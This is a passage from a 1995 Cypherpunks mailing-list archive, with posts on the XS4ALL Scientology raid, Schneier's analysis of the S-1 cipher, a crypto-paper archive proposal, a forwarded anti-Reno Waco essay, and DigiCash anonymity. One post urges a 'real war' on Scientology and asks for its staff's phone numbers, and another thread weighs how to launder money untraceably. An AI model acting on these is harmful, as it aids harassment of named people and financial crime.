to something innocuous yet unique and recompile it. > As you've probably guessed, I'm not supposed to have any personal > files on my work computer, and an entire encrypted volume would > undoubtedly make someone go ballistic if they discovered it. When I > want to use my encrypted file system, I reboot off of a floppy, and > all Secure Device programs and drivers are kept on the floppy. The > only thing that has to be left on the hard drive is the encrypted > volume itself. Well, there's a risk of someone seeing a mysterious file and deleting it anyway... assuming they don't go ballistic over it anyhow. There's also a risk of someone peering over your shoulder and noticing that something's afoot as well, is there not? From buster at klaine.pp.fi Wed Sep 6 04:37:21 1995 From: buster at klaine.pp.fi (Kari Laine) Date: Wed, 6 Sep 95 04:37:21 PDT Subject: Police and scientology visit XS4ALL Amsterdam Message-ID: <199509061135.AA26720@personal.eunet.fi> > PRESS RELEASE > ------------- > Police and members of Scientology church enter offices of XS4ALL > ================================================================ They really are not getting it - are they stupid or what? Scientology people are not behaving so I take a standing that I don't have to behave when I treat them as well. Good, remember they started it ... > Today at about 14:00, XS4ALL was visited by Mr. S. Braan, > bailiff. Sorry to hear that Mr. Braan >Religious Technology Centre O camoon - that name sounds great what's inside it? Research department of Brainwashing? Wast that the technology you tried to sell to CIA? And luckily CIA told you to piss off. >, better known as the Scientology Church, or > Scientology for short. He was assisted by a local police officer and Mr. > Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology > in The Netherlands. We would need a list of all legal offices representing scienos in all countries. Also does anyone has a list of top scienos and some kind of organization flow chart of this evil emperium? >Also present were two computer experts (Mr. Ootjes > and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and > two American employees of Scientology, Mr. Weightman and Ms. Jenssen. Does anyone has tel number to these Co$s? > Scientology is filing for seizure of XS4ALL's computer equipment. Under > dutch law, this means that a bailiff comes in to record your assets. In > real-life, the computer-experts that were present have recorded the > types and serial numbers of all the computers in our offices. They did > not take any equipment, the continuity of XS4ALL's services is not in > jeopardy. Good - you have civilised police there. > XS4ALL is not alone in receiving this kind of attention from > Scientology. Scientology, a semi-religious multinational, is at war with > a number of people on the Internet. They wan't a war - well let's give them one! I don't mean this bashing in the net - I mean a REAL WAR! Co$ has been on offensive for some time now and they must be got to the defence mode. > Until recently, the church has always managed to supress critical voices > by means of sheer intimidation and by engaging in endless legal battle. I think it would be a jolly good day if they would try that against me. I would make best of it... > One of these documents is a piece to which Scientology supposedly holds > the copyright and which has been added to the kit without the church's > permission. Screw with their permission. Sorry for the raw language but I get so damn angry when I even see these scienos mentioned. To fight them we need an organization to fight them. Todays situation is like uncontrolled and thefore unoptimised guerrilla operations. Results will be weak. Best Regards Kari Laine Kari Laine buster at klaine.pp.fi LAN Vision Oy Tel. +358-0-502 1947 Sinikalliontie 14 Fax +358-0-524 149 02630 ESPOO BBS +358-0-502 1576/1456 FINLAND From bianco at itribe.net Wed Sep 6 05:48:12 1995 From: bianco at itribe.net (David J. Bianco) Date: Wed, 6 Sep 95 05:48:12 PDT Subject: Searchable Crypto Paper Archive? Message-ID: <199509061244.IAA01601@gatekeeper.itribe.net> [My apologies if this is a repost. The original was posted a a couple of days ago via a news gateway which may or may not have actually worked.] I was trying to dig up some cryptography papers cited as references today, when a thought hit me; there seem to be a fair amount of crypto papers available on the Net, but they're pretty scattered. Bell Labs has some online, which is great! The cypherpunks FTP archive has a few, though you can't perform keyword searches against them. In short, it's hard to find papers unless you already know what you want and where it might be. Having had some experience in designing and implementing technical report retrieval services, I naturally think there's room for improvement here. 8-) What I have in mind is something like NASA's NTRS ("NASA Technical Report Server", ), which I helped design and implement at my last job. The basic idea behind NTRS is that users submit a query to a sort of "search multiplexer" which queries a list of selected databases, merges the separate result sets and gives them back to the user. The results are typically bibliographic and abstract data about papers, which contain links to the papers themselves if they are available online, or ordering info if they're not. From past experience, I think this model could be applied here very successfully. One way to accomplish this would be to establish an archive where people could submit papers to be indexed. Larger institutions (such as Bell Labs) might run their own servers, so they would have control of their own content but could still be searched via the multiplexer. Users of the service could then search all the different archives they were interested in with one simple query. Anyway, this is what I'd like to see. I'm willing to work on such a system if there's enough positive feedback. Does anyone else think they'd like to use or contribute to such a system? -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From rah at shipwright.com Wed Sep 6 06:03:28 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 6 Sep 95 06:03:28 PDT Subject: Lotus Notes vs. the Web and the Net Message-ID: At 11:29 PM 9/5/95, Timothy C. May wrote: >On this one I agree...and I've said this here on this list. Local groups, >such as university departments, corporate departments, even entire >corporations, can use the Web/Net in ways similar to what Lotus Notes >provides (using their own LANs, or even the Internet, with suitable >security steps). My favorite financial application for small multinationals (one of my clients is a haircutter with 50 salons and 4 schools worldwide) is nightly remittances to the home office in e$, especially in cash. The consequences for the banking and tax systems are obvious. But it's possible to imagine interesting changes in the foriegn exchange markets as well ... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From m5 at dev.tivoli.com Wed Sep 6 06:13:41 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 6 Sep 95 06:13:41 PDT Subject: Another Son of Clipper discussion paper In-Reply-To: Message-ID: <9509061312.AA12676@alpha> Lucky Green writes: > Windows 95 is on a lot of people's hard drives. It is therefore public and > available for every one's inspection. How many people do you know that > have reverse engineered Windows 95. How many of those use a reverse > engineered version. I'd venture it is zero out of zero. Problems with this analogy: 1) Windows 95 is somewhat bigger than your typical encryption routine; 2) The factor of motivation isn't considered. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From schneier at winternet.com Wed Sep 6 07:09:33 1995 From: schneier at winternet.com (Bruce Schneier) Date: Wed, 6 Sep 95 07:09:33 PDT Subject: the S-1 Algorithm Message-ID: <199509061409.JAA05371@subzero> [I just posted this to sci.crypt. I don't normally read Cypherpunks, so please forward any substantive replies directly to me. Thanks. -Bruce] I was in Europe while S-1 was posted, so I missed most of the discussion. Better late than never.... Over the last year, I have spent considerable effort collecting SKIPJACK information. I have gone through the published literature, the rumors, and a large stack of documents received by EPIC through Freedom of Information Act (FOIA) lawsuits. At Crypto last week I gave a Rump Session talk entitled "Reverse Engineering SKIPJACK from Open Sources." I prepared the slides before I left for Europe. Here is what I said: What the government told us: Single-key block cipher. Can be used in ECB, CBC, CFB, or OFB. 64-bit block size. 80-bit key size. What the review committee told us: 32 rounds. No weak keys (like DES has). No key complementation property (like DES has). What the hardware specifications tell us: The latency of the Mykotronx chip has 64 clock cycles. This means two clock cycles per round. Assorted rumors (excuse me if I don't reveal sources): SKIPJACK does not have rounds in the same sense that DES does: i.e., half of the text block is not encrypted in each round. SKIPJACK has half the total S-box data as DES. SKIPJACK has a 48-bit internal structure analogous to a 32-bit internal structure in DES. The masks for the Clipper/Capstone chip are unclassified and the chips can be produced in an unclassified foundry. Part of the programming in the secure vault includes installing part of the SKIPJACK algorithm. The part of the algorithm installed in the secure vault are the "S-tables", suggesting that perhaps unprogrammed Clipper chips can be programmed to implement other 80-bit key, 32 round ciphers. Trying to puzzle out the meaning of the third rumor, Matt Blaze and I invented something called an Unbalanced Feistel Network. These are Feistel networks where the source and target blocks are of different size. For example, in each round 48 bits might be used as an input into the F function, and produce 16 output bits to be XORed with the remainder of the bits. We called this a 48:16 UFN, and we proposed a design at last year's Algorithms Workshop in Leuven. Our design was broken, but I am still examining the structure. A 48:16 UFN satisfies the first and third rumor above, and I think it as good a guess as any regarding SKIPJACK. A few months ago, I found some additional information in the form of documents released under FOIA. One document was a Mykotronx design review for "Project Capstone" dated 10 December 1991. The design review was unclassified. Among the details about the modular multipliers and the SHA code was the following page about SKIPJACK: ECB Processing Rate 2 clocks per G-Box operation x 1 G-box per shift x 32 shifts per ECB encryption ______________________________ 64 clocks per ECB 64 clocks per ECB / 64 bits out per ECB = 1 clock per bit Yields 40 Mbit encryption using a 40 MHz clock. The only other thing I found was a SECRET memo. The organization name (either from or to) is blacked out. The date is 25 August 1992. The subject is "SKIPJACK Revision." Paragraph 2 is blacked out, but paragraph 1 reads: 1. (U) The enclosed Informal Technical Report revises the F-table in SKIPJACK 3. No other aspect of the algorithm is changed. That's it. Rounds are called "shifts," which seems to indicate that they are not "rounds" in the DES sense. A shift consists of a "G-box" operation, which includes not only what we call the F- F-function but the XOR as well. And there is something called an F-table, which could be a table of constants or perhaps a table of functions. In any case, it is something that can be revised without changing the rest of the algorithm. Now let's look at S-1. The most probable explanation is that it is a hoax. But it is a very good hoax: The hoaxer knew enough about algorithm design to make a cipher that was not obviously lousy, while at the same time not unduly complicated. The hoaxer knew enough to make a design that included three novel ideas not seen anywhere else: S-boxes that are created according to no known criteria, a G-table that chooses a rotation of S-boxes to use in a given round, and a bizarre key schedule. The hoaxer knew enough about how algorithms are used in the military to make a spookish interface. I am particularly interested in the "zeroize" function, the separation of the key creation and key loading functions, and the key masking. Blaze said that the interface was similar to the Fortezza interface, but not the same. The hoaxer knew about Blaze's and my MacGuffin paper and that we thought SKIPJACK was a 48:16 UFN. We made no secret about this, and our paper is on Blaze's web page. The hoaxer knew to use the term F-table. I haven't shown many people what I found in EPIC's documents, so the hoaxer either had to look through them himself or get them by some other means (maybe an independent FOIA request). It's not a perfect hoax, though. The classification markings look odd: NSA algorithms are SECRET, not TOP SECRET, and the codeword restriction sentence is strange. The key schedule is hopelessly flawed (David Wagner posted an attack to sci.crypt). The coding style is amateurish, like it was translated from one language to another. (Maybe this is clever on the hoaxer's part.) And there's even a typo in the code. And maybe the hardware latency is wrong. Clearly the design facilitates parallelization. You can precompute all possible F- table outputs in previous shifts, and then use the G-table result to select between them; I am not sure you can get a shift down to two clock cycles. I don't have the hardware background, and would appreciate comments from others. And why are there not bitwise permutations? If SKIPJACK is designed for hardware, it makes sense to put them in. They're free, after all. Anyway, it's a real good hoax. Blaze estimated that he could have done it, but it would have taken him a month of effort. I agree with his assessment: one man-month. It's a lot of time to spend on a hoax, especially one where the hoaxer doesn't get any credit. So, maybe it's SKIPJACK. It has a 64-bit block size and an 80- bit key size. It's a 48:16 UFN with 32 rounds (or shifts, or whatever). And it has an F-table. This is really interesting, because the structure really is an S-box. Everyone knows it's an S-box, and it makes no sense for a hoaxer to call it something else. But in S-1 it's called an F-table. (I think this is very significant, but others find it less convincing.) And the F-table has been revised at least once. In the code it says that the F-table entries "differ in the S-2 version." The code is dated 1 February 1989 and 31 July 1991, and I have a memo dated 25 August 1992 that says the F-table has been revised in "SKIPJACK 3." Pretty convincing, I think. (Of course this means that we can't confirm anything by testing the hardware, since the F-table entries are different.) Maybe there are no bit permutations because they make analysis harder, and perhaps they don't add all that much. Maybe the algorithm was designed for both hardware and software, or maybe it was designed for specialized cryptographic hardware with several parallel microprocessors and some cryptographic primitives. If it is real, we have a lot to learn about S-box design. The S- boxes are not even balanced. Maybe they are created just so to avoid some bizarre attack we can only dream about, but I kind of doubt it. But the key schedule is just plain wrong. So, here's a theory. Let's assume the code is real. (Not that it's SKIPJACK, but that it's a real algorithm from some military or some corporation.) Clearly the code is not designed to test the cryptographic algorithm, but to simulate some kind of hardware interface: it's called a "software chip simulator." If I were the NSA and I designed an algorithm whose security rested on some tables of constants, I might replace them with phony constants before giving them to another organization to test. I might call the phony version S-1 and the real version S-2. Maybe the code was originally written in FORTRAN, and then translated into C. (NSA doesn't use ADA.) NSA algorithms are classified SECRET, put perhaps algorithms in development are classified TOP SECRET. (We know cryptanalytic techniques can be TOP SECRET, so perhaps commented code falls under that category as well.) And maybe the code originally didn't have an 80-bit key schedule. Maybe it had a longer key schedule. The poster then modified this key schedule to make it look more like SKIPJACK. (This might also explain the bug in the code, which might not be a bug if it still had the original key schedule.) Which leaves us precisely nowhere. The most likely explanation is that it is a hoax, but I am hard-pressed to imagine a hoaxer with the requisite combination of skills, resources, and attitude. I also don't believe that it is SKIPJACK. It might be a preliminary design for SKIPJACK, but if both the key schedule and F-table entries are wrong, we really haven't learned anything. If we suddenly discovered that unbalanced S-boxes are far superior to balanced ones, then all best are off. Bruce ************************************************************************ * Bruce Schneier 2,000,000,000,000,000,000,000,000,002,000, * Counterpane Systems 000,000,000,000,000,000,002,000,000,002,293 * schneier at counterpane.com The last prime number...alphabetically! * (708) 524-9461 Two vigintillion, two undecillion, two * 730 Fair Oaks Ave. trillion, two thousand, two hundred and * Oak Park, IL 60302 ninety three. ************************************************************************ From mfroomki at umiami.ir.miami.edu Wed Sep 6 07:22:49 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Wed, 6 Sep 95 07:22:49 PDT Subject: "This discussion is off-topic, please take it elsewhere" In-Reply-To: Message-ID: You keep talking about this "Eric Hughes" nym. I've been a member of this list for weeks, months, over a year even, and I never see any posts from "him". Is he a dead tentacle? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | This post is smiley-free and may injure the humor-impaired. From tunny at Inference.COM Wed Sep 6 07:49:18 1995 From: tunny at Inference.COM (James A. Tunnicliffe) Date: Wed, 6 Sep 95 07:49:18 PDT Subject: Equinox/cypherpunks/www Message-ID: <304DB3A8@smtp-pc> > Anyone that missed or was unable to get the UK TV programme Equinox > might like to take a look at: > > http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html > > - Andy Thanks for the pointer. I was reading through their nicely organized gentle introduction to basic concepts, when I nearly sprayed coffee all over my monitor from laughing so hard at the following gaffe: "...most modern codes rely on the intractable mathematical problem of 'factorisation'. This is the process of trying to find the two prime factors that, multiplied together, would give you a third prime number. [JT: Yes, I'd call that an intractable problem, all right.] For example, if you take 3337 - a prime number (i.e. a number that has precisely two divisors) - how would you find its two prime factors? (They are, in fact, 47 and 71.)" A little unclear on that "prime" thing, it sounds like... :-) - Tunny ______________________________________________________________________ James A. Tunnicliffe | WWWeb: http://www.inference.com/~tunny Inference Corporation | PGP Fingerprint: CA 23 E2 F3 AC 2D 0C 77 tunny at Inference.com | <--finger for key 36 07 D9 33 3D 32 53 9C ====================================================================== From anon-remailer at utopia.hacktic.nl Wed Sep 6 08:14:19 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 6 Sep 95 08:14:19 PDT Subject: Michael Moriarity in _Penthouse_ on Law Enforcer Power Expansion Message-ID: <199509061513.RAA17510@utopia.hacktic.nl> From: "Clay Irving" Date: Wed, 6 Sep 1995 07:36:47 -0500 To: sea-list at panix.com Subject: (Fwd) Michael Moriarity in _Penthousse_ Mime-Version: 1.0 Thought I'd pass this along -- It was in my mailbox this morning... --- Forwarded mail from "Linda Thompson, American Justice Federation" Date: Wed, 6 Sep 95 02:52 EST To: news at aen.org From: lindat at iquest.net (Linda Thompson, American Justice Federation) Subject: Michael Moriarity in _Penthousse_ In the "Special 26th Anniversary Issue -- Collector's Edition" of _Penthouse_, Michael Moriarity wrote the "Advise & Dissent" feature. The cover tickler reads: "Michael Moriarity -- Charging Janet Reno with Genocide" TREES FOR ALL THE DEAD CHILDREN by Michael Moriarity [The author is an Emmy, Tony, and Golden Globe award-winning actor. He is also an accomplished classical and jazz pianist-composer, with three CDs in release and another about to be recorded.] _A nation may lose its liberties in a day and not miss them for a century._ Montesquieu I am sitting in a sidewalk cafe in Canada at the moment. I am here because I can no longer live in the United States of America. The nation my father knew as a surgeon for the Detroit Police Department and the country in which my grandfather built a 50-year professional baseball career has become a nightmare of lies, propaganda, and vicious disinformation pouring out of Washington, D.C. Today, the F.B.I. and Janet Reno are asking for new legislation that would permit them to investigate anyone for simply opposing their ideas of what causes violence. I protested the attorney general's initial assault on network television during her back-room meetings with NBC executives. "What are we talking about here?" asked Dick Wolf, executive producer of "Law and Order." "Federally controlled programming between the hours of three and six?" "How about three to nine." Janet Reno said that without a question mark. It was not a request. It seemed to her a foregone conclusion. She had the right to say the most insane thing I've heard from a reasonably well-dressed person, let alone the highest law-enforcement officer in the land. she claimed that the mere words of a murder-mystery TV show were dangerous to the health of the nation. I simply asked that she be relieved of her post and sent on a long vacation and given therapy. Who left their jobs instead? Philip Heymann, her respected deputy, and yours truly. Resignations in protest. Now she and her Justice Department -- and even more recently, Bob Dole, the next frighteningly viable candidate for president of the United States -- would like to brand all artists and producers dealing with dramatizes violence and sex as accessories to drive-by shootings, terrorist bombings, and the moral degeneration of our nation. And she's hoping that people like me and Rush Limbaugh, and anyone who makes fun of her, like David Letterman, will be counted by the American public as accessories to the bombing in Oklahoma. Did Al Capone really learn everything he knew from George Raft? Was the death of Christopher Marlowe a product of the fight scenes in William Shakespeare's _Romeo and Juliet_? Blaming violent drama for real-life violence is like indicting _Penthouse_ for the spread of AIDS. Until I left my country, I was living in a novel by Franz Kafka, with characters like the real Elie Wiesel telling me, "It's not possible, Michael. This is America." They told Elie and his family the same thing in Europe, just before they carted him off to Auschwitz. "It's not possible, Elie. This is Germany." How far is Janet Reno willing to go in her definition of what is causing violence? "I know 'Murder She Wrote' has no violent images," said the attorney general, "but they talk about nothing but violence." What does this mean? Does she charge that Jessica Fletcher was an agent provocateur for Timothy McVeigh in the Oklahoma City bombing? Has Angela Lansbury been derelict in her concern for the children? Was Reno's fear of language, this frontal assault on the entire meaning of the First Amendment, merely a lapse in the attorney general's thinking process? As "kooky" and as "noisy" and as "paranoid" as I am accused of being, I have never put together a sentence quite that sick. Where was the reaction from the Fourth Estate, the one branch of our democratic process that is sworn, above all, to uphold our freedom of speech? Today, unfortunately, the media is a direct extension of the two-party system, and now that the Republicans and Democrats are a coalition dedicated to expanding federal law-enforcement armies exponentially, there is little protest from the pundits. A coalition in a two-party democracy is not an option. It is tyranny. Since mainstream American journalism is either Republican or Democratic, we now hear no outcry (although _The New York Times_ did quote one "law-enforcement official at the Treasury Department .. who spoke on condition that he not be named, [who] said there was a tremendous potential for abuse in some of the recent F.B.I. proposals to relax the standards for investigating suspected terrorists"). Speaking out publicly would risk careers, and if anything is at fault for the disastrous situation we are in, it is a mad obsession with career. Read John Dean's _Blind Ambition_ if you don't believe me. My role in the miniseries "Holocaust" -- that of the Nazi lawyer Eric Dorf -- was inspired by the idea that if Watergate's John Dean were a German professional in the 1930s and less sensitive to his own corruption, he would have risen to the very top of the Third Reich. With no strong feelings, apart from an obsession with his own career, such a man would find himself standing proudly at the side of Adolf Hitler. "Free speech," the Justice Department seems to be saying, "is the root cause of all violence." Has anyone been fired for such a tyrannical notion? No, but Jocelyn Elders was dismissed for broaching the possibility that our drug laws should be reexamined, and for speaking honestly about AIDS and condoms and children. I began my campaign fighting the drug laws. I'm right back to those statutes as the main cause of domestic violence in America. Only this time the violence is not the drive-by shootings in ghettos. It is the speed with which our law enforcement has been destroyed from within by its own increasing power. The F.B.I. will be given almost absolute power to harass and wiretap and investigate any opponent of the standing government. The drug laws and now, so conveniently, the Oklahoma City bombing are the linchpins for billions of dollars pouring into the American law-enforcement community. Their increasing freedom to hassle suspected anti-big-government agitators must not be threatened. Will it work? Not if this nation sees the tapes called _Waco: The Big Lie_, a two-part examination of the murder of the Branch Davidians. This video, which Gary Null wrote about in _Penthouse_ this past April, is all over the country now, and more and more people will see it despite how Janet Reno, the F.B.I., and the leadership of both parties try to misinform the public about the tapes and their maker, Linda Thompson. The obvious questions raised by Thompson's analysis of government-approved violence are damning to the F.B.I., the Bureau of Alcohol, Tobacco, and Firearms, Janet Reno, and all other parties accessory to the obvious cover-up. They show hard evidence of a government lynch mob at Waco. If the Rodney King tapes won him $2 million, the implications of _Waco: The Big Lie_ could win the surviving Branch Davidians tens and possibly hundreds of millions from the government, criminal charges against perpetrators, and the downfall of major careerists in the current administration. Now, with the help of her spokesmen, who just happen to be President Clinton and Bob Dole, possibly the next occupant of the White House, Janet Reno is trying to convince America that her enemies are just as bad as her own army. They can't be worse. Try as she may, she knows that history cannot draw the bombers of children as any worse than the burners of children. Washington, D.C., is saying that there is a difference between the children of Waco and the children of Oklahoma City. The deaths in Oklahoma warrant capital punishment. "Swift and severe punishment," was the fate the president and attorney general promised for the killers of federal employees. Since the F.B.I., the C.I.A., A.T.F., and other arms of federal law enforcement have been gutting the Bill of Rights for years, such threats are not unlike the reprisals announced in Germany following the Reichstag fire. What about the death of civilians? Not only does Reno not call for capital punishment for the incineration of the Waco children and the equally cold-blooded murders in Idaho of survivalist Randy Weaver's wife and child by federal agents, her response to these crimes doesn't even merit the term _pursuit of justice_. And any movement that calls for such justice, like Linda Thompson's American Justice Federation, is branded "fanatic." Who has more blood on their hands? Network television or federal law enforcement? Until justice befalls the Justice Department, a tree must be planted for all the children of violence ... including the children of Waco. "Peace is not the absence of war," said one letter written to me while I was performing in the television series "Law and Order." "It is the presence of Just." ---End of forwarded mail from "Linda Thompson, American Justice Federation" -- .-. .-. / \ .-. .-. / \ / \ / \ .-. _ .-. / \ / \ -/--Clay Irving-N2VKG-(clay at panix.com)-\---/---\-----/-----\-------/-------\-- http://www.panix.com/clay `-' `-' \ / \ / \ / `-' `-' \ / `-' `-' From wilcoxb at nag.cs.colorado.edu Wed Sep 6 08:46:25 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Wed, 6 Sep 95 08:46:25 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) In-Reply-To: Message-ID: <199509061545.JAA24947@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I, Bryce Wilcox wrote: > > > Suppose you have acquired a million dollars worth of legal, above-board > > DigiCash dollars and you want to surreptitiously transfer this wealth to > > a below-board friend. Your friend creates a temporary anonymous account > > at an understanding bank. shamrock at netcom.com (Lucky Green) wrote: > > Won't work. Ecash, except as used for frequent flyer like points, will > exist in only *one* world wide e$ currency, issued by a single entity > composed of various major banks and subject to US laws. Getting Ecash > accounts will therefore be subject to the same legal requirenments that > apply to normal US checking accounts. 1. Sez who? 2. We are discussing the feasibility of using DigiCash currency for illegal money laundering. We have to assume (ceteris paribus) that the would-be launderers are still capable of the same tricks that they are currently capable of, which, apparently, includes access to anonymous bank accounts. > > Now without active physical surveillance, nobody other than yourself and > > your friend will ever know where the money went, and you can't prove > > that you gave it to him, either... > You or a sting operation can always reveal the recipient by publishing the > blinding factor. If you do it via his one-time bank account then you can only reveal to which one-time anonymous account you transferred the money-- no more. Even if you and your beneficiary don't have this option, the transaction is still much safer and more convenient if done via DigiCash than via any other current currency. Criminals and conspirators live with the everpresent problem of betrayal, and this "one step, one way, requires the cooperation of the payer" traceability seems to me to be a small hassle on the way to a big win for such people. > Besides, your Ecash client keeps a log of the payees. Crytographically (and in the limit, legally) meaningless, right? I could edit my log right now to say I gave you a thousand cyberbucks in return for an illegal copy of some information, but no-one would care. I appreciate your correspondance. Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQCVAwUBME3CFvWZSllhfG25AQFi3gQAmyJoB3RJKx3lNb1fCLPluulVbi6kh3+I ++fGXC8vTGOEfaNnkjOxvcZ5VCXRJNlwQB9D2hKICSJCxpoQWKSDjgEWy48HH8AV P0LSBfQ/LX9O91X7/dkyBCDoULhPx2HYTSbOgumS10+X/IsldUfcY36q0tTQy3u7 7ES5HIG2wv8= =idOQ -----END PGP SIGNATURE----- From jonathon at japan.sbi.com Wed Sep 6 09:17:28 1995 From: jonathon at japan.sbi.com (Jonathon Fletcher) Date: Wed, 6 Sep 95 09:17:28 PDT Subject: "This discussion is off-topic, please take it elsewhere" In-Reply-To: Message-ID: On Wed, 6 Sep 1995, Michael Froomkin wrote: > > You keep talking about this "Eric Hughes" nym. I've been a member of > this list for weeks, months, over a year even, and I never see any posts > from "him". Is he a dead tentacle? [deleted] > > This post is smiley-free and may injure the humor-impaired. > is he kidding ? -Jon PS: In case I qualify as humor impaired - Eric 'potty-trains' majordomo. -- Jonathon Fletcher, Salomon Brothers Asia Limited, Tokyo jonathon at japan.sbi.com From tcmay at got.net Wed Sep 6 09:25:08 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 09:25:08 PDT Subject: Searchable Crypto Paper Archive? Message-ID: At 12:48 PM 9/6/95, David J. Bianco wrote: >I was trying to dig up some cryptography papers cited as references >today, when a thought hit me; there seem to be a fair amount of crypto >papers available on the Net, but they're pretty scattered. Bell Labs >has some online, which is great! The cypherpunks FTP archive has a >few, though you can't perform keyword searches against them. In >short, it's hard to find papers unless you already know what you want >and where it might be. > >Having had some experience in designing and implementing technical >report retrieval services, I naturally think there's room for >improvement here. 8-) What I have in mind is something like NASA's >NTRS ("NASA Technical Report Server", >), which I helped >design and implement at my last job. It's an idea with some attraction. But some issues need discussing. Being an analytical sort of person, prone to looking for flaws in ideas, I'll mention a few: 1. First and foremost, _copyright_ issues. Most articles are copyrighted (automatically, by Berne Convention) and the permission of the authors must be obtained. Authors may also collect royalties, or the conferences may, so unlimited electronic distribution is a potential problem. NASA can publish its reports (and those of other government agencies) electronically because it has the copyrights, or the copyrights are free and clear. Try putting someone's article on the Net without their permission and look out. Indeed, there are a couple of the most important papers on the soda archive site, some of them scanned-in and OCRed by "The Information Liberation Front." There are so few that the authors likely don't even know they are there, or care. But try to put lots of copyrighted material on a site and get ready for actions. Remember, most nations are party to the Berne Convention(s). 2. Many of the papers have complex typography, lots of equations and diagrams. These reproduce poorly on most screens, and really need a new level of display presentation. (Yes, I know about Adobe Acrobat, which I have. Ditto for FrameMaker, and a few other such systems. But not many others have them.) I happen to know the ILF member who posted the Chaum "Dining Cryptographers" paper, anonymously, and know that he picked that paper both because of its importance to his interests and because it was pure text, with no equations and no diagrams. This made it a natural for scanning. 3. In the crypto domain, the papers are much more conveniently concentrated into a handful of conference proceedings, nearly all published by Springer-Verlag. (Those great silvery-grey paperbacks.) This point about Springer-Verlag relates to Item #1 above. Namely, that copyright holders (Springer-Verlag, through publishing arrangements with the conferences) will not take kindly to folks making the papers available electronically. This point, about the limited number of main crypto volumes, also implies another point: many of these papers refer to other papers in the same volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will refer to papers in that volume or earlier volumes). This makes it *even more advantageous* for a serious researcher to buy the complete set of volumes. 4. Authentication issues. Electronic versions of articles will need to be signed, to prevent unauthorized modifications. The infrastructure for this is beginning to build, but is clearly not available to many. I am confident that someday most journals will be published electronically. Many people think this likely, whether in 5 years or 15 years. Just too many advantages. However--and this is my point--before that happens a huge amount of negotiation about author's rights to reproduction, about verification of copies, about royalty payments for copies, etc., has to happen. And, the display software/hardware is not quite there yet....too many people would be unable to see the equations and diagrams on the screen. In 5 years, less of a problem. Many authors make their papers available by anonymous ftp, or via the Web. I think this is the way to do it: let those who feel their papers need electronic dissemination do so. The author makes the choice. In summary, this project is probably premature (technologically), has numerous copyright issues to be resolved, and is probably less needed in the crypto community than in some other areas. (Granted, we are not following those other areas, necessarily. But that other domains have not yet gone fully electronic is indicative that others see some of these same problems, and are likely to address them before the math/crypto community does.) Sorry to dissect this proposal so thoroughly, but it's one of the things I do. --Tim May (P.S. The copyright problems can possibly be skirted by using anonymous remailers and offshore data havens in jurisdictions that will not raid the sites, or by message pools. But these are major steps, mostly untested. A "Scientology" site is probably a better test than a site with crypto papers. I wouldn't want to run either of them.) ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From bianco at itribe.net Wed Sep 6 09:46:21 1995 From: bianco at itribe.net (David J. Bianco) Date: Wed, 6 Sep 95 09:46:21 PDT Subject: Searchable Crypto Paper Archive? In-Reply-To: Message-ID: <199509061642.MAA01932@gatekeeper.itribe.net> On Sep 6, 9:36, Timothy C. May sent the following to the NSA's mail archives: > Subject: Re: Searchable Crypto Paper Archive? Thanks for the reply. I think there are a few misconceptions, though. I've responded in place to some of your comments... || || It's an idea with some attraction. But some issues need discussing. Being || an analytical sort of person, prone to looking for flaws in ideas, I'll || mention a few: || || 1. First and foremost, _copyright_ issues. Most articles are copyrighted || (automatically, by Berne Convention) and the permission of the authors must || be obtained. Authors may also collect royalties, or the conferences may, so || unlimited electronic distribution is a potential problem. || || NASA can publish its reports (and those of other government agencies) || electronically because it has the copyrights, or the copyrights are free || and clear. Try putting someone's article on the Net without their || permission and look out. || || Indeed, there are a couple of the most important papers on the soda archive || site, some of them scanned-in and OCRed by "The Information Liberation || Front." There are so few that the authors likely don't even know they are || there, or care. But try to put lots of copyrighted material on a site and || get ready for actions. Remember, most nations are party to the Berne || Convention(s). Hmmm... I guess I didn't specifically mention this point since it seemed obvious to me, though I probably should have: Papers should come from the authors or the organization which holds the copyright. I wouldn't be in favor of accepting 3rd party submissions, for both copyright and authenticty/integrity issues. || || 2. Many of the papers have complex typography, lots of equations and || diagrams. These reproduce poorly on most screens, and really need a new || level of display presentation. (Yes, I know about Adobe Acrobat, which I || have. Ditto for FrameMaker, and a few other such systems. But not many || others have them.) || || I happen to know the 